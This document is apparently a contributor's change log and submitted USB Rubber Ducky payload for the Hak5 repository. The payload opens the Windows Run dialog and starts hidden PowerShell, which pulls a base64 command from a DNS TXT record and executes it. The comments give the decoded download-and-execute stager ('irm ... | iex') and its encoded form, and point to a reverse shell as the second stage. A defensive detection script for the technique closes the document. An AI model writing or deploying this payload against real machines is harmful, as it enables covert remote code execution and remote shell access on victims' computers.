Made changes requested from pull request.
1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actual payload content. - Removed the clutter
4. If your target machine is Windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is run on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing. So, removed extension, added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. Also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
REM Title: DNS-TXT-CommandInjection
REM Author: Nate
REM Description: A USB Rubber Ducky payload that leverages DNS TXT records to perform command injection.
REM Windows PowerShell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64-encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in the AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web server hosting the payload. In this example, python3 http.server was used to host a
REM reverse shell.
REM REQUIRED - Provide the URL used for the example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: As an alternative without base64, replace "$a=",";powershell -e $a" with just "|iex"
REM in the STRING payload below. Examples of the decoded command and encoded command to put
REM into the DNS TXT record are shown below.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the PowerShell script to convert your payloads to Base64.
REM https://
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
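
Detection sketch for the technique this payload uses, added here as an example and not part of the payload or the Hak5 repository: it flags process command lines that feed a Resolve-DnsName TXT lookup into PowerShell execution, and TXT values that decode (base64, UTF-16LE, the format `powershell -e` expects) to a download-and-run one-liner. Function names, regexes and the sample log lines are assumptions constructed for illustration; the encoded TXT value is the one shown in the payload comments.

```python
import base64
import binascii
import re

# Resolve-DnsName asking for TXT data, anywhere in a process command line.
LOOKUP = re.compile(r"resolve-dnsname\b.*\btxt\b", re.I)
# PowerShell running a string: -e/-ec/-enc.../-EncodedCommand (also with "/"), or iex.
EXEC = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s|\biex\b|\binvoke-expression\b", re.I)
# Download-and-run cmdlets and aliases expected in a staged one-liner.
SCRIPT = re.compile(
    r"\b(?:irm|iwr|iex|invoke-(?:restmethod|webrequest|expression)|downloadstring)\b", re.I)
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def flag_command_line(cmd: str) -> bool:
    """True when one command line both queries TXT records and executes a string."""
    return bool(LOOKUP.search(cmd) and EXEC.search(cmd))

def decode_txt(value: str):
    """Return the UTF-16LE text behind a base64 TXT value, or None if it is not one."""
    value = value.strip().strip('"')
    if len(value) % 4 or not B64.fullmatch(value):
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def flag_txt_record(value: str) -> bool:
    """True when a TXT value, raw or base64-decoded, reads as a PowerShell stager."""
    decoded = decode_txt(value)
    return bool(SCRIPT.search(decoded if decoded is not None else value))

# Constructed process-creation command lines (e.g. Event ID 4688 or Sysmon Event ID 1).
COMMAND_LINES = [
    "powershell /w 1 $a=(resolve-dnsname example.com TXT).strings;powershell -e $a",
    "powershell /w 1 (resolve-dnsname example.com TXT).strings|iex",
    "powershell Resolve-DnsName example.com -Type TXT",              # admin checking SPF
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]
# TXT values: the encoded example from the payload comments, and a constructed SPF record.
TXT_RECORDS = [
    "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==",
    "v=spf1 include:_spf.example.com ~all",
]

if __name__ == "__main__":
    for line in COMMAND_LINES:
        print(flag_command_line(line), line)
    for record in TXT_RECORDS:
        print(flag_txt_record(record), decode_txt(record) or record)
```

The command-line rule needs process creation logging with command-line capture enabled; the TXT check can run over DNS resolver logs or passive DNS data.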